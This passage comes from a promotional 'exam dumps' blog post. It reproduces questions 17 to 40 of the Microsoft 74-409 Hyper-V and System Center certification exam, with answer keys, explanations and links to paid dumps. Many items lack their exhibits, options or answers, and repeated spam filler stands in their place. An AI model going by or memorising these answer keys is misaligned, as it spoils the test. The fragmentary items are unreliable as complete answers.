/ Must be accessible by VMM and by the host computer.
/ Cannot be in a perimeter network. A perimeter network, which is also known as a screened subnet, is a collection of devices and subnets placed between an intranet and the Internet to help protect the intranet from unauthorized Internet
users. The source computer for a P2V conversion can be in any other network topology in which the VMM server can connect to the source machine to temporarily install an agent and can make Windows Management Instrumentation (WMI)
calls to the source computer.

QUESTION 17
An organization has private and public cloud resources. The organization has Windows Server 2012 R2 servers that have the Hyper-V role installed. You have one four-node cluster of Hyper- V host servers. You use System Center 2012 R2.
The virtual machines that run on the cluster must remain online when you install updates on the Hyper-V host servers.
You need to install updates on the Hyper-V host servers.
What should you do?
A. Configure Windows Server Update Services (WSUS) to provide updates to the Hyper-V host servers in the cluster.
B. Add all the virtual machines hosted on the cluster to a collection in System Center 2012 R2 Configuration Manager. Deploy updates to the collection.
C. Use the Cluster-Aware Updating (CAU) wizard.
D. Configure Windows Update on the Hyper-V host servers to download updates from Microsoft Update.
Correct Answer: C
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/gg675084.aspx
CAU is an automated feature that enables you to update clustered servers with little or no loss of availability during the update process. During an Updating Run, CAU transparently performs the following tasks:
?Puts each node of the cluster into node maintenance mode ?Moves the clustered roles off the node ?Installs the updates and any dependent updates
?Performs a restart if necessary
?Brings the node out of maintenance mode
?Restores the clustered roles on the node
?Moves to update the next node
For many clustered roles (formerly called clustered applications and services) in the cluster, the automatic update process triggers a planned failover, and it can cause a transient service interruption for connected clients. However, in the case
of continuously available workloads such as Hyper-V with live migration or file server with SMB Transparent Failover, CAU can coordinate cluster updates with no impact to the service availability.
Note
The CAU feature is only compatible with Windows Server 2012 R2 and Windows Server 2012 failover clusters and the clustered roles that are supported on those versions.

QUESTION 18
Your environment contains one Active Directory Domain Services (AD DS) domain. All domain controllers have Windows Server 2012 R2 installed. All domain controllers are virtualized domain controllers.
You design a disaster recovery strategy. You have the following requirements:
The domain controllers can be recovered in the event that a Hyper-V host server fails.
The AD DS domain must be restorable to a consistent state.
You must minimize the data loss.
You need to ensure that the domain controllers can be recovered in the event of a failure. What should you do?
A. Clone the domain controller that holds the PDC Emulator role to a different Hyper-V host server. Schedule a Windows PowerShell job to run the Checkpoint- VM cmdlet on each virtual domain controller.
B. Run Windows Azure Hyper-V Recovery Manager.
C. On each guest operating system, run Windows Server Backup.
D. On the host operating system, run Windows Server Backup.
E. Schedule a Windows PowerShell job to back up each domain controller’s virtual hard disk (VHD) file.
Correct Answer: C
Explanation
Explanation/Reference:
http://technet.microsoft.com/en-us/library/d2cae85b-41ac-497f-8cd1- 5fbaa6740ffe(v=ws.10) #backup_and_restore_considerations_for_virtualized_domain_controllerspass4itsure 74-409 exam dumps

QUESTION 19
You manage a virtualization environment that contains Windows Server 2012 R2 servers that have the Hyper-V role installed. You manage the host servers by using Virtual Machine Manager (VMM) in System Center 2012 R2.
You must monitor the virtualization environment, including all virtual machines and service instances.
You need to configure monitoring.
Which three actions should you perform? Each correct answer presents part of the solution.
A. Import the VMM Management Pack and then deploy agents to the Hyper-V host servers and the VMM server. On the Hyper-V host server, enable agent proxy for the Operations Manager agent.
B. In the VMM console, add the name of an Operations Manager server to the management group that will be used to monitor the virtualization infrastructure.
C. On the VMM server, install the Operations Manager console.
D. On the Operations Manager management server, enable Windows Remote Management (WinRM).
E. Import the VMM Management Pack and then deploy agents to Hyper-V host servers and the VMM Server. On the VMM server, enable agent proxy for the Operations Manager agent.
F. Configure the VMM server and the Active Directory computer accounts of the Hyper-V host servers to allow constrained delegation.
Correct Answer: ABC
Explanation
Explanation/Reference:
http://blogs.technet.com/b/kevinholman/archive/2012/08/21/integrating-vmm-2012-and-opsmgr- 2012.aspx Step 1: (C)
The Operations Manager is a requirement.
With System Center Operations Manager 2012 SP1, customers can now monitor Hyper-V Replica using a Management Pack available for free from the SCOM catalogue.
Step 2: (A)
An Operations Manager agent is a service that is installed on a computer. The agent collects data, compares sampled data to predefined values, creates alerts, and runs responses.A management server receives and distributes configurations to agents on monitored computers.
Step 3: (B)
Enter in one of your management server names to provide the SDK connection to VMM. Next we will need two accounts. One for SCVMM to connect to SCOM, and one for SCOM to connect to SCVMM.

QUESTION 20
A company has Active Directory Domain Services (AD DS) domain controllers that run Windows Server 2012 R2. You prepare a disaster recovery plan for Active Directory. You have the following requirements:
The domain controller restore process must complete as quickly as possible.
After the restore process completes, the Active Directory database on the domain controller must be brought up to date by using replication.
You need to implement the disaster recovery plan.
What should you do?
A. Authoritatively restore the domain controllers by using the ntdsutil.exe tool.
B. Restore the domain controllers by using the Active Directory Recycle Bin.
C. Back up and restore the domain controllers by using the wbadmin.exe tool.
D. Back up and restore the domain controllers by using the Idp.exe tool.
Correct Answer: C
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/magazine/dd767786.aspx
wbadmin: Enables you to back up and restore your operating system, volumes, files, folders, and applications from a command prompt. http://technet.microsoft.com/en-us/library/cc754015.aspx ntdsutil: Ntdsutil.exe is a command-line tool that
provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS).
You can use the ntdsutil commands to perform database maintenance of AD DS, manage and control single master operations, and remove metadata left behind by domain controllers that were removed from the network without being
properly uninstalled. This tool is intended for use by experienced administrators. http:// technet.microsoft.com/en-us/library/cc753343.aspx Active Directory Recycle Bin: Active Directory Recycle Bin helps minimize directory service downtime
by enhancing your ability to preserve and restore accidentally deleted Active Directory objects without restoring Active Directory data from backups, restarting Active Directory Domain Services (AD DS), or rebooting domain controllers. http://
technet.microsoft.com/en-us/library/dd392261%28v=ws.10%29.aspx ldp: This GUI tool is a Lightweight Directory Access Protocol (LDAP) client that allows users to perform operations (such as connect, bind, search, modify, add, delete)
against any LDAP- compatible directory, such as Active Directory.
LDP is used to view objects stored in Active Directory along with their metadata, such as security descriptors and replication metadata.
http://technet.microsoft.com/en-us/library/cc772839%28v=ws.10%29.aspx

QUESTION 21
You are the virtualization administrator for an organization. The organization uses all components of System Center 2012 R2 in its production environment.
You need to configure the environment to support Performance and Resource Optimization (PRO).
How should you configure the environment? To answer, drag the appropriate server role to the correct location or locations. Each server role may be used once, more than once, or not at all.
You may need to drag the split bar between panes or scroll to view content.pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/hh882396.aspx

QUESTION 22
You use System Center 2012 R2 Virtual Machine Manager (VMM) to manage a Hyper-V environment that consists of two host groups named Dev1 and Prod1. It also has two private clouds named DevCloud and ProdCloud.
You have a self-service user role named DevVMAdmins. DevVMAdmins does NOT have the rights to perform any actions. DevVMAdmins must have the ability to start virtual machines (VMs), stop VMs, and shut down VMs. It must also be
able to use resources from other self- service users.
You need to configure the DevVMAdmins user role.
How should you complete the relevant Windows PowerShell command? To answer, drag the appropriate Windows PowerShell segments to the correct locations in the cmdlet. Each Windows
PowerShell segment may be used once, more than once, or not at all. You may need to drag the split bar between panes or scroll to view content.pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Set-SCUserRole
Modifies the settings for an existing VMM user role.
* The actions that you can grant a Self-Service user include the following:
CanReceive Receive resources from other self-service users
*Parameter: -Permission<SelfServicePermission[]>
Specifies the actions that members of a Self-Service User role can perform on their virtual machines or services.
Valid values are: AllowLocalAdmin, Author, CanShare, CanReceive, Checkpoint, CheckpointRestoreOnly, Create, CreateFromVHDOrTemplate, PauseAndResume, RemoteConnect,
Remove, Save, Shutdown, Start, Stop, Store.

QUESTION 23
A company uses System Center 2012 R2 Virtual Machine Manager (VMM) to manage their Hyper-V environment. The VMM environment has two host groups named Dev and Prod. The Hyper-V environment has the following requirements:
Administrators of the Prod host group must be able to manage virtual machines (VMs) and perform all VMM administrative tasks only within the Prod host group.
Administrators of the Dev host group must be able to manage VMs and perform all VMM administrative tasks only within the Dev host group.
Administrators of the Dev host group must be able to provision new Hyper-V host servers from physical computers for the Dev host group.
The security administrators must be able to add user objects to the Administrator role in VMM.
All delegation must adhere to the principle of least privilege.
You need to configure the user role profiles for each host group. Which user role profiles should you assign? To answer, drag the appropriate user role profile to the correct user group.
Each user role profile may be used once, more than once, or not at all. You may need to drag the split bar between panes or scroll to view contentpass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Note:
* Fabric Administrator (Delegated Administrator)
Members of the Delegated Administrator user role can perform all administrative tasks within their assigned host groups, clouds, and library servers, except for adding XenServer and
adding WSUS servers. Delegated Administrators cannot modify VMM settings, and cannot add or remove members of the Administrators user role.
http://technet.microsoft.com/en-us/library/gg696971.aspx

QUESTION 24
A company has a Hyper-V host server that runs Windows Server 2012 R2 Datacenter edition. The host server has a Generation 2 virtual machine (VM) that runs Windows Server 2012 R2 Standard edition. The drive that contains the VM
system partition is at 90 percent of its capacity.
You have the following requirements:
The VM must continue to run during any system maintenance activities.
You must use the least amount of administrative effort to accomplish the task.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in the correct orderpass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 25
A software company has a Windows Server 2012 R2 server that has the Hyper-V role installed. The server hosts a single virtual machine (VM) named VM1. VM1 has one virtual CPU, one virtual hard disk, and one virtual network interface
card (NIC) that is attached to an external network.
The company prepares to test its software in VM1. Before testing begins, VM1 must meet the following requirements:
Availability of network bandwidth must be maximized.
VM network connectivity must be fault tolerant.
You need to configure the environment.
Which four actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in the correct order.pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Note:
* Set-VMNetworkAdapter
The Set-VMNetworkAdapter cmdlet configures features of the virtual network adapter in a virtual machine or the management operating system.
/ parameter -AllowTeaming<OnOffState>
Specifies whether the virtual network adapter can be teamed with other network adapters connected to the same virtual switch. The value can be On (allowed) or Off (disallowed).
* New-NetLbfoTeam
The New-NetLbfoTeam cmdlet creates a new NIC team that consists of one or more network adapters. Teaming network adapters of different speeds is not supported. You can create a team with network adapters of different speeds, but the
network traffic distribution algorithms do not take the speed of each network adapter into consideration when distributing traffic.
Incorrect:
* New-NetSwitchTeam
Creates a new switch team.

QUESTION 26
You have a Windows Server 2012 R2 server that has the Hyper-V role installed. The company has the following requirements for the Hyper-V host server:
Virtual machines (VMs) must only communicate with other VMs and the Hyper- V host server.
You must be able to monitor all TCP/IP packets to and from VMs from the moment that VMs are able to communicate.
You must support a third-party program that uses the Network Driver Interface Specification (NDIS) API to monitor the TCP/IP packets between VMs.
You need to configure the environment.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in the correct orderpass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 27
You administer the following Windows Server 2012 R2 Hyper-V environment:pass4itsure 74-409 exam dumps

The environment also contains a computer named WORKSTATION1 that runs Windows 8. You need to perform maintenance on SERVER1. You have the following requirements:
Perform live migration for VM-APP1.
Use one of the Hyper-V management tools on WORKSTATION1 to perform the live migration tasks.
You need to migrate VM-APP1.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in the correct order.

pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
* Box 1:
/ (Optional) Configure constrained delegation
If you have decided to use Kerberos to authenticate live migration traffic, configure constrained delegation before you proceed to the rest of the steps.
/ To manage the tasks with remote management tools, configure constrained delegation and select Kerberos as the authentication protocol.
* (Box2, Box 3) To move a running virtual machine
Connect to the source server using one of the following methods (unless you are signed in to the source server):
/ From Server Manager, click All Servers and then click the name of the source server.
/ From Hyper-V Manager, in the navigation pane, click the name of the source server.

QUESTION 28
You are the virtualization administrator for an organization. You manage a virtual machine (VM) by using System Center 2012 R2 Virtual Machine Manager. The VM is in a running state. You plan to use the System Preparation (Sysprep) tool
to create a virtual machine template from the VM.
You need to save a copy of the VM before you run the Sysprep tool. Which actions should you take? To answer, drag the appropriate actions to the correct locations in the answer area. Each action may be used once, more than once, or not
at all. You may need to drag the split bar between panes or scroll to view contentpass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
You must shut down the VM before cloning it.

QUESTION 29
A company uses System Center 2012 R2 Virtual Machine Manager (VMM). The VMM server has the following shares:
You need to configure VMM to share physical resources with private cloud users. Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in
the correct order.pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
1) In \\Share1, create a shared folder named Data.
2) In \\Share1\Data, create a folder named ApplicationFrameworks
3) Copy the contents of the ApplicationFrameworks folder from the default library to \\Share1\Data\Appli- cationFrameworks. Add the \\Share1\Data \ApplicationFrameworks shared folder to the VMM library
Reference:
http://technet.microsoft.com/en-us/library/gg610575.aspx

QUESTION 30
You administer the Hyper-V environment for a company. All virtual machines must use dynamic memory and virtual non-uniform memory access (NUMA) settings that are aligned to the underlying hardware.
One virtual machine is misconfigured.
You need to update the misconfigured virtual machine.
In the Settings dialog box for the virtual machine, which two options should you select?

pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

QUESTION 31
You administer two Windows 2012 R2 servers named SERVER1 and SERVER2. Both servers have the Hyper-V role installed. SERVER1 has network adapters that have Remote Direct Memory Access (RDMA) enabled. You plan to
implement live migration in the environment.
You have the following requirements:
Use remote management tools to manage the live migration tasks.
Optimize network performance during live migration.
You need to configure live migration settings on each host server. In the Live Migrations section of the Hyper-V Settings window, which two options should you select? To answer, select the appropriate option buttons in the dialog box in the answer area.pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 32
A company has a single Active Directory Domain Services (AD DS) domain and Windows Server 2012 R2 servers that have the Hyper-V role installed. The company uses System Center 2012 R2 Virtual Machine Manager (VMM) to manage
the Hyper-V environment. Users access company resources from the Internet.
There is an existing front-end web server farm that contains virtual machines (VMs), as shown in the Front-end Web Server Farm exhibit. (Click the Exhibit button.) You use the VMs to deliver a website to the Internet.pass4itsure 74-409 exam dumps

The company plans to enhance overall security of the virtual environment. The front-end web servers must NOT be able to communicate with each other.
You need to implement changes to the environment.
For each of the following statements, select Yes if the statement is true. Otherwise, select No. Each correct selection is worth one point.

pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 33
A company has six physical Windows Server 2012 R2 servers. The servers are configured as shown in the following diagram:pass4itsure 74-409 exam dumps

Host 1 and Host2 run Windows Server 2012 R2 and have the Hyper-V role installed. You need to configure the environment to support shared files that use the VHDX file format. Use the drop-down menus to complete each statement based
on the information presented in the screenshot. Each correct selection is worth one point.

pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 34
A company uses System Center 2012 R2 Virtual Machine Manager (VMM). You need to create and assign a self-service user role in VMM.
You have the following requirements:
All role members must share ownership of all virtual machines (VMs) that any role member creates.
Role members must be able to deploy VMs.
Role members must NOT have authoring rights.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions to the answer area and arrange them in the correct orderpass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Note:
*(box 1, box 2) If you want all role members to share ownership of all virtual machines that any member creates, create a security group in Active Directory and assign that group to the user role.
*(box 3) For a self-service user to deploy a virtual machine from a template, the following is required:
/The self-service user role must have the Deploy or Deploy (From template only) actions in their user role scope.
/ The template must be available to the self-service user role as an assigned resource, or the self-service user role must be granted access in the template properties.

QUESTION 35
You plan to implement guest clustering that contains two virtual machines (VMs). You review the following information from one of the VMs:
The Validate File System test results in the Failover Clustering Validation Report, as shown in the Validation Report exhibit (Click the Exhibit button.)pass4itsure 74-409 exam dumps

The Features page of the Add Roles and Features Wizard, as shown in the Features Wizard exhibit (Click the Exhibit button.)

pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 36
A company has a Windows Server 2012 R2 Hyper-V environment that includes two separate Active Directory Domain Services (AD DS) domains. The environment also has three servers named HOST1, HOST2, and HOST3 that have the
Hyper-V role installed. HOST1 and HOST2 are configured as a failover cluster. The environment is configured as shown in the following diagram:pass4itsure 74-409 exam dumps

You plan to deploy two new virtual machines named VM-Server1 and VM-Server2. You have the following requirements:
Deploy both virtual machines as a failover cluster.
Utilize virtual hard disk (VHD) sharing for the cluster.
The virtual machines must survive a host server hardware failure.
You need to deploy the virtual machines.
Use the drop-down menus to complete each statement based on the information presented in the screenshot. Each correct selection is worth one point.

pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:

QUESTION 37
A company has a Hyper-V environment that includes three servers named HOST1, HOST 2, and FILESERVER1. HOST1 and HOST2 run Windows Server 2012 R2 that have the Hyper-V role installed. FILESERVER1 runs Windows Server
2008 R2 and has the File Services role installed. All of the hardware supports Offloaded Data Transfer (ODX). The servers are configured as shown in the following diagram:

pass4itsure 74-409 exam dumps

STORAGE1 is encrypted with BitLocker.
You need to support ODX for all of the virtual machines on HOST1. Use the drop-down menus to complete each statement based on the information presented in the screenshot. Each correct selection is worth one point.

pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/jj200627.aspx

QUESTION 38
You are the virtualization administrator for an organization. You use System Center 2012 R2 Virtual Machine Manager (VMM) to configure a virtual machine (VM) template that will host a new application.
You have the following requirements for new VMs that host the application:
New VMs must be highly available.
You must join the VMs to an Active Directory Domain Services domain at deployment.
You need to modify the VM template to support the requirements. On the properties page for the template, which two settings should you configure? To answer, select the appropriate settings in the answer areapass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/hh427282.aspx

QUESTION 39
A company has a single Active Directory Domain Services (AD DS) domain and four Windows Server 2012 R2 servers that have the Hyper-V role installed. The company uses System Center 2012 R2 Virtual Machine Manager (VMM) to
manage the Hyper-V environment. One set of Hyper-v host servers is dedicated for use by the development environment. A second set of Hyper-v host servers is dedicated for use by the production environment.
The network architects assign the IP address subnets as shown in the following table:

pass4itsure 74-409 exam dumps

The network architects also prepare a network design for the Hyper-V environments as shown in the Network Design exhibit. (Click the Exhibit button.)

pass4itsure 74-409 exam dumps

You need to ensure that the implementation team can implement the network design successfully. For each of the following statements, select Yes if the statement is true. Otherwise, select No. Each correct selection is worth one point.

pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Ref:
http://blogs.technet.com/b/scvmm/archive/2013/06/17/logical-networks-part-v-network- virtualization.aspx
http://technet.microsoft.com/en-us/library/jj721570.aspx

QUESTION 40
You have an environment that contains the servers as shown in the following table:pass4itsure 74-409 exam dumps pass4itsure 74-409 exam dumps

Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/gg610658.aspx

Conclusion:
Bsabio is a blog that shares free exam dumps, we offer you online practice tests, the latest sharing of 40 authentic
Microsoft Windows Server 2012 74-409 exam dumps and 74-409 pdf to help you open the door to learning if you want to get 74-409 Test the certificate, select https://www.pass4itsure.com/74-409.html (q&as:99 Latest). Please pay attention to bsabio. We will always update the latest
effective test dump 100% free

[PDF] Free Microsoft Windows Server 2012 74-409 dumps download from Google Drive: https://drive.google.com/open?id=10H3OZstgJdCsBPuNpl2_7En59vTnWqdt

[PDF] Free Full Microsoft dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

pass4itsure 15% OFF Coupon code

pass4itsure 74-409 coupon

related: https://www.bsabio.org/discount-cisco-642-883-dumps-sproute-study-guide/